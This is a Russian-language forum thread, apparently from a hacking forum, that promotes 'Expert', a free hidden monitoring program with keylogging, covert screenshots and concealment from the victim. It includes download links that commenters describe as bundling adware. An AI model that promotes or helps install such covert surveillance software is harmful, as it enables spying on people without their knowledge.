Expert(домашний шпион)

mr.buk

Участник
Статус
Сиё чудо называется Expert, и Вы скоро поймёте почему.
Если коротко, то это программа для скрытого мониторинга система, а точнее действий пользователь: какие сайты он посещает, что просматривает, когда выключает/ перезагружает компьютер, что печатает.
Из преимуществ данной программы можно отметить следующее:
- абсолютно бесплатна;
- скрыта от пользователя;
- минимально влияет на работу системы;
- гибкие параметры настройки;
- техпотдержка.
Теперь немного про самое вкусное:
1) программа делает скриншоты по заданному ей расписанию (от 1 раза с секунду до ... ни делает вообще ). Таким образом можно настроить какой объём архива Вы будете просматривать. Есть возможность выполнения скриншотов по какому-либо из действий пользователя: клик правой клавишей мыши, клик левой клавишей мыши, нажатие клавиши Enter. И что самое приятное, качество создаваемых снимков можно настраивать, что будет сказываться как на объёме отдельного снимка, так и всего архива. Скриншоты сохраняется в формате, неизвестном ОС и программам-просмотрщикам, так что пользователь даже при желании не сможет найти, а тем более просмотреть архив.
2) Функция кейлогера: Вы сможете просматривать, что пользователь набирал на клавиатуре.
3) Мониторинг включения/ выключения компьютера, перезагрузки. Вы можете просматривать, когда пользователь завершал работу ОС.
4) Посещаемые сайты.
5) Программа не отображается в списке установленных программ, так что пользователь не будет знать о её существовании.
6) Вызов программы осуществляется нажатием комбинации 4 клавиш: Shift + Ctrl + Alt + выбранная Вами. Выходит окно ввода пароля, который как Вы понимаете, может быть сколь угодно сложный.
Из настроек считаю нужным отметить возможность задать размет архива на один день, соответственно программа не будет превышать этого лимита, и размер архива в днях (сколько дней хранить архив). Программа полностью расскоязычна, поддержка и файл справки тек же на русском.

[FONT=tahoma, arial, verdana, sans-serif, Lucida Sans]Программа есть в свободном доступе,но буду рад если скачайте по моей ссылке [/FONT]:)

[FONT=tahoma, arial, verdana, sans-serif, Lucida Sans]http://disk-space.ru/download/cd4755fcd0/Expert_3.1.rar.html/ (может устоновиться амиго и еще куча дряни) используйте adwcleaner[/FONT]

Fusked

Хакер
Статус
Может надо было в раздел софт писать?
А за ссылки с Амиго, вообще убивать надо, хоть бы ещё нормальную ссылку скинул.

sir.vederkin

Новичок
Статус
Прога отличная)) но ссылки с амиго реально убивают)))
Нашел эту прогу в сообществе форума в вк) подписывайтесь) там тоже есть много очень интересного ))
https://vk.com/black_forum

mr.buk

Участник
Статус
Может надо было в раздел софт писать?
А за ссылки с Амиго, вообще убивать надо, хоть бы ещё нормальную ссылку скинул.
это сам сайт добовляет,программа в открытом доступе,думаю сможите найти ее,а для тех кто не в состоянии сам найти бесплатную программу думаю она им не нужна

Fusked

Хакер
Статус
это сам сайт добовляет,программа в открытом доступе,думаю сможите найти ее,а для тех кто не в состоянии сам найти бесплатную программу думаю она им не нужна
Ладно когда кидают реф и не реф ссылки, там даже не грех и по реф перейти, если всё толково изъяснено, а тут как говорят "Бабы дуры или да?" =) Либо качай с амиго тут, либо ищи сам. Тоже ведь не дело, зарабатывай на тех кто переходит по ссылке, пожалуйста, но и нужно предоставить выбор ссылок, иначе того что было в группе ВК достаточно, чтобы погуглить и тема получается нужна только чтобы установить Амиго), или я не прав? Если ты говорил про меня, что я не в состоянии погуглить, то ты ошибаешься.
и я тут немного плюю желчью, потому-что каждый день я проезжаю заправку Амиго и мне кажется что он везде

Rudolf

Участник
Статус
прога отличная,но я вас прошу перезалейте на норм файлообменник,дело даже не в том что я не смогу найти эту программу в гугле и даже амиго не помеха её скачать.просто если что-то выкладываешь.то делай это качественно,для людей всетаки стараешься))

mr.buk

Участник
Статус
Ладно когда кидают реф и не реф ссылки, там даже не грех и по реф перейти, если всё толково изъяснено, а тут как говорят "Бабы дуры или да?" =) Либо качай с амиго тут, либо ищи сам. Тоже ведь не дело, зарабатывай на тех кто переходит по ссылке, пожалуйста, но и нужно предоставить выбор ссылок, иначе того что было в группе ВК достаточно, чтобы погуглить и тема получается нужна только чтобы установить Амиго), или я не прав? Если ты говорил про меня, что я не в состоянии погуглить, то ты ошибаешься.
и я тут немного плюю желчью, потому-что каждый день я проезжаю заправку Амиго и мне кажется что он везде
в группе вк Я публиковал,а прогрумму эту скачать не сложнее чем оперу,согласен тему криво офрмил)

mr.buk

Участник
Статус
прога отличная,но я вас прошу перезалейте на норм файлообменник,дело даже не в том что я не смогу найти эту программу в гугле и даже амиго не помеха её скачать.просто если что-то выкладываешь.то делай это качественно,для людей всетаки стараешься))
чуть позже залью)

mr.buk

Участник
Статус
http://cs09.superfiles.me/f/0/14554...7498a289de29a0cbc60a/Expert_3.1-spaces.ru.rar
специально для тебя

Последнее редактирование:

Rudolf

Участник
Статус

mr.buk

Участник
Статус

BROSovod

Участник
Статус
Да классная прога, сам такой пользовался, когда была необходимость отслеживать что происходит на моём компе, когда меня нет дома. Вот бы ей ещё функцию отправки отчётов на мыло, вообще бы цены не было

mr.buk

Участник
Статус
Да классная прога, сам такой пользовался, когда была необходимость отслеживать что происходит на моём компе, когда меня нет дома. Вот бы ей ещё функцию отправки отчётов на мыло, вообще бы цены не было
она есть,в более новой версии))только не на мыло а на фтп вроде

PlayKillerBot

Участник
Статус
Ты конечно хорошее нашел место где ссылки на diskspace кидать... А по теме, качайте Mipko Personal Monitor он лучше.

mr.buk

Участник
Статус

mr.buk

Участник
Статус

halk

Новичок
Статус
Такое ощущение, что здесь на форуме кидалы пытаются кинуть кидал, много ссылок (включая сабж) ведут на не безопасные ресурсы.

Lord Veliar

Заблокированные
Статус
Гарант сделок
...
Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
Такое ощущение, что здесь на форуме кидалы пытаются кинуть кидал, много ссылок (включая сабж) ведут на не безопасные ресурсы.

Мы не можем проверять каждый способ, что выкладывается на форуме)
Могу поручится только за платные темы, одобренные администрацией, и мною лично. Работоспособность бесплатных схем, выложенных простыми пользователями, оценивайте самостоятельно, методом проб и ошибок. Со временем, с первых строк будете понимать, стоит ли вообще тратить на способ своё время)​